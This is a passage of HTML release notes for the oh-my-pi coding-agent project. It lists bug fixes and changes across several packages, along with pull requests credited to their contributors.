<li>Added the <code>AGENT=1</code> environment variable to child processes spawned by <code>coding-agent</code> to allow downstream tools to detect agent-driven execution.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Consolidated Exa web-search configuration under <code>exa.enabled</code>, automatically migrating legacy <code>exa.enableSearch</code> values and removing obsolete Researcher and Websets settings.</li>
<li>Removed stale <code>computer.backend</code> values during configuration migration.</li>
<li>Updated documentation and error messages for the JavaScript/TypeScript debug adapter (<code>js-debug-adapter</code>) to clarify supported installation paths (Mason, standalone tarball, or <code>JS_DEBUG_DAP_SERVER</code>).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where <code>/reload-plugins</code> and the Agent Control Center failed to propagate updated agent definitions to existing tools without a restart.</li>
<li>Fixed legacy Pi extensions failing to load when calling <code>pi.unregisterProvider()</code>, ensuring provider replacements take effect immediately.</li>
<li>Fixed zero-width daemon readiness and wait regex matches being rejected by the hub wire decoder.</li>
<li>Fixed proxy model discovery preferring bundled catalog names over proxy-reported names, allowing <code>omp models refresh</code> to correctly update display names.</li>
<li>Fixed Windows compiled binary builds failing due to backslash-separated paths in <code>Bun.Glob.scan</code> producing invalid JavaScript in virtual modules.</li>
<li>Fixed the Ctrl+O (<code>app.tools.expand</code>) shortcut not expanding truncated tool output when a tool-approval prompt or selection dialog had keyboard focus.</li>
<li>Improved <code>omp commit</code> error reporting when pre-commit or commit-msg hooks fail, displaying the hook's own message and exiting non-zero cleanly instead of printing bundled source code.</li>
<li>Fixed <code>omp commit --push</code> exiting with code 0 without pushing when the working tree is already clean; it now correctly pushes existing commits.</li>
<li>Fixed <code>omp commit</code> exiting with code 0 when the commit agent failed and fell back to a mechanical commit; it now exits non-zero to indicate the fallback was used.</li>
<li>Fixed strict output schemas being rejected when native JSON Schema definition maps contain <code>ref</code> or applicator branches use <code>properties</code> without <code>type</code>.</li>
<li>Fixed shell syntax extraction in <code>cd &lt;path&gt; &amp;&amp; ...</code> commands to prevent redirects, extra arguments, or shell expansions from being incorrectly absorbed into the structured working directory path.</li>
<li>Applied reason-specific backoff to transient rate-limit retries and consolidated exhausted retry errors.</li>
<li>Fixed session-tree rows rendering as empty bullets for bookkeeping entries (such as title changes, credential pins, and mode changes); these are now hidden by default and properly labeled in <code>all</code> mode.</li>
<li>Fixed extension and custom tools inheriting same-named built-in TUI renderers, which could overwrite successful results with incorrect status text.</li>
<li>Fixed prewalk lifecycle handling to prevent plan injection on rejected same-model/same-effort arms, ensure consumed plan nudges do not return after context rebuilds, and prevent settings-enabled prewalk from implicitly re-arming restored sessions.</li>
<li>Fixed the todo completion reminder interrupting pauses when waiting for non-English questions (such as Chinese, Japanese, Korean, or Spanish prompts ending in <code>？</code> or <code>?</code>).</li>
<li>Normalized resolved file paths in read summaries, PDF image handles, and notebook errors to prevent agents from learning malformed paths.</li>
<li>Fixed a bug where a per-turn <code>before_agent_start</code> system prompt override was silently dropped during base-prompt rebuilds.</li>
<li>Fixed ACP <code>session/load</code> and <code>session/resume</code> failing with <code>ACP session not found</code> for sessions created under the legacy hashed project-directory scheme by falling back to a global ID scan.</li>
<li>Fixed <code>vault://&lt;name&gt;?op=...</code> commands targeting the active vault instead of the named vault in Obsidian CLI queries.</li>
<li>Fixed the status-line <code>session_name</code> segment to honor the <code>statusLine.sessionAccent</code> setting, falling back to the theme's accent color when disabled.</li>
<li>Fixed automatic <code>agent.continue()</code> paths failing to run context-fit maintenance when reverting to a smaller-context model after a cooldown expiry.</li>
<li>Fixed <code>/handoff</code> reporting "Handoff cancelled" for actual generation or stream timeout errors, ensuring the real error is surfaced.</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Changed</h3>
<ul>
<li>Pasting an empty named register (<code>PUT … @name</code> with no matching capture) now surfaces a warning listing available registers and removes the span target instead of throwing an error.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where pipe-numbered <code>read</code>/<code>search</code> rows copied into top-level and bare-body patch payloads were not properly recovered (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5090045419" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7905" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/7905/hovercard" href="https://github.com/can1357/oh-my-pi/issues/7905">#7905</a>).</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where an interrupted local embedding model download could permanently corrupt the cache and silently disable semantic recall. The system now automatically detects incomplete model files, clears the corrupted cache, and retries the download.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Added</h3>
<ul>
<li>Added support for Windows hosts in <code>bun run build</code>, enabling local N-API builds against VS Build Tools without requiring a pre-configured vcvars prompt.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Replaced the miniaudio (<code>maudio</code>) dependency with in-house platform audio backends for <code>AudioCapture</code>/<code>AudioPlayback</code>: CoreAudio AudioQueue on macOS, shared-mode WASAPI on Windows, and PulseAudio (ALSA fallback) loaded via <code>dlopen</code> on Linux. Removes the bindgen/libclang requirement and the Windows rustc-ICE workaround from the native build.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed CPU feature detection (AVX2) on Windows hosts, resolving an issue where the native addon loader and local builds incorrectly fell back to the baseline variant, while improving startup performance by ~270ms.</li>
<li>Fixed <code>bun run build:bindings</code> failing on Windows due to incorrect resolution of the <code>@napi-rs/cli</code> entry point.</li>
<li>Fixed a compiler crash (rustc ICE) when building the <code>maudio</code> package for Windows.</li>
<li>Fixed synthesized macOS keyboard and pointer events suppressing physical user input.</li>
<li>Fixed several Wayland input and capture issues, including preventing read-only calls from acquiring persistent input control, fixing GNOME Wayland pointer input initialization, and resolving conflicts between <code>libei</code> input and PipeWire screen capture.</li>
<li>Fixed compilation of the <code>wayland-pipewire</code> Cargo feature.</li>
<li>Improved security on Wayland by cleaning up orphaned world-readable RemoteDesktop restore tokens on startup.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where Herdr panes lost native terminal scrollback during TUI transcript replacements or resize redraws.</li>
<li>Fixed an issue inside tmux where explicit display resets retained stale light/dark palettes and leaked terminal capability bytes into the editor.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>repair</code> and <code>rawKeys</code> options to <code>parseFrontmatter</code> to support spec-conformant loading (disabling lenient recovery and preserving keys verbatim), and exported <code>normalizeFrontmatterKeys</code> for manual key normalization.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed the in-house <code>marked</code> list tokenizer incorrectly consuming trailing blank lines at the end of input, ensuring correct list tightness and token generation matching standard <code>marked</code> behavior.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): preserve scrollback in Herdr panes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chessl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chessl">@chessl</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5078798827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7810">#7810</a></li>
<li>fix(coding-agent): clean up legacy Exa and computer settings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chessl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chessl">@chessl</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5079298667" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7814" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7814/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7814">#7814</a></li>
<li>fix(coding-agent/tools): preserve native JSON Schema containers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kimprap/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kimprap">@kimprap</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5079409325" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7816" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7816/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7816">#7816</a></li>
<li>fix(ai): classify Simplified Chinese quota exhaustion as credential-rotatable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IceCodeNew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IceCodeNew">@IceCodeNew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5080699687" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7828" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7828/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7828">#7828</a></li>
<li>fix(coding-agent): prefer proxy-reported model name over bundled catalog name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vinhnguyen1211/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vinhnguyen1211">@vinhnguyen1211</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5081464111" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7832" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7832/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7832">#7832</a></li>
<li>fix(commit): report hook refusals cleanly and honor --push on a clean tree by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5081627253" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7836" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7836/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7836">#7836</a></li>
<li>fix(tui): make Ctrl+O expand tool output regardless of focus by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5081896468" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7840" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7840/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7840">#7840</a></li>
<li>fix(coding-agent): signalled fallback commits with a non-zero exit code by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhang17-24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhang17-24">@zhang17-24</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5082644747" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7844" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7844/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7844">#7844</a></li>
<li>fix(catalog): enrich Alibaba Token Plan discovered model limits by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mustaqeem66/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mustaqeem66">@Mustaqeem66</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5083454267" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7849" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7849/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7849">#7849</a></li>
<li>fix(extensions): roll back providers after load failure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mustaqeem66/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mustaqeem66">@Mustaqeem66</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5083725092" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7853" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7853/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7853">#7853</a></li>
<li>feat(coding-agent): mark child processes as agent-driven by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5083990908" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7854" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7854/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7854">#7854</a></li>
<li>fix(catalog): update Devin reasoning family routing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/will-bogusz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/will-bogusz">@will-bogusz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086031482" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7865" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7865/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7865">#7865</a></li>
<li>fix(status-line): honor sessionAccent toggle for session_name segment by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaelumSea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaelumSea">@CaelumSea</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086119373" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7867" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7867/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7867">#7867</a></li>
<li>fix(natives): prevent macos input suppression by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086454638" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7873" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7873/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7873">#7873</a></li>
<li>fix(anthropic): honor ANTHROPIC_BASE_URL for chat requests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086716844" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7875" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7875/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7875">#7875</a></li>
<li>fix(auth): purge pre-org OAuth tombstone on org-scoped re-login by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086824773" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7878" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7878/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7878">#7878</a></li>
<li>docs(agent-hub): document subagent observability by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087243654" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7881" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7881/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7881">#7881</a></li>
<li>fix(natives): port wayland capture to pipewire 0.9 Rc handle API by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087618001" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7887" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7887/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7887">#7887</a></li>
<li>fix(bash): constrain leading cd extraction to a single path token by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087625249" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7888" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7888/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7888">#7888</a></li>
<li>fix(ai,catalog): widen Bedrock stream-stall watchdog via model compat by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voonfoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voonfoo">@voonfoo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087855708" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7892" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7892/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7892">#7892</a></li>
<li>fix(natives): make Windows-host builds and addon loading work end to end by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zerx-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zerx-lab">@zerx-lab</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5088557956" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7896" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7896/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7896">#7896</a></li>
<li>feat(ai): add Cursor personal usage reporting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chessl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chessl">@chessl</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5058553518" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7613" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7613/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7613">#7613</a></li>
<li>perf(extensions): import extension modules concurrently by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5070115533" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7709" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7709/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7709">#7709</a></li>
<li>fix(coding-agent): preserve before_agent_start prompt override across base rebuilds by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5075384014" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7756" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7756/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7756">#7756</a></li>
<li>docs(coding-agent): clarify js-debug-adapter install is not an npm package by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcastillo18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcastillo18">@fcastillo18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5075625420" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7759" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7759/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7759">#7759</a></li>
<li>fix(session): handle subscription-cap retry exhaustion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076704901" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7772" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7772/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7772">#7772</a></li>
<li>fix(vault): pass vault= as top-level obsidian cli option by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076731824" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7773" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7773/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7773">#7773</a></li>
<li>fix(tui): gate built-in renderers by tool provenance by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076732290" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7774" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7774/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7774">#7774</a></li>
<li>fix(tree): stop rendering bookkeeping entries as empty rows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ParadaCarleton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ParadaCarleton">@ParadaCarleton</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076884476" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7782" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7782/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7782">#7782</a></li>
<li>fix(acp): resolve session/load across legacy session directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076888727" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7783" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7783/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7783">#7783</a></li>
<li>fix(coding-agent): make prewalk lifecycle one-shot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eggpeat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eggpeat">@eggpeat</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076997950" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7785" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7785/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7785">#7785</a></li>
<li>fix(read): normalize recovery paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5077342471" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7790" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7790/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7790">#7790</a></li>
<li>fix(tui): avoid leaking DA1 through tmux appearance refresh by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anatoli-tsinovoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anatoli-tsinovoy">@anatoli-tsinovoy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5078302210" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7801" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7801/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7801">#7801</a></li>
<li>fix(coding-agent): detect non-English questions in todo reminder guard by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5078448024" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7806" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7806/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7806">#7806</a></li>
<li>fix(ai): preserve Copilot integrator entitlement errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5079890724" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7821" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7821/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7821">#7821</a></li>
<li>fix(natives): share one runtime across wayland portal paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087648477" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7889" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7889/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7889">#7889</a></li>
<li>fix(computer): lazily request wayland input permission by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087668785" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7890" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7890/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7890">#7890</a></li>
<li>fix(session): surface real handoff errors instead of false cancel by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5089951657" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7904" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7904/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7904">#7904</a></li>
<li>fix(hashline): recover pipe-numbered read rows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5090099679" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7906" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7906/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7906">#7906</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chessl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chessl">@chessl</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5078798827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7810">#7810</a></li>
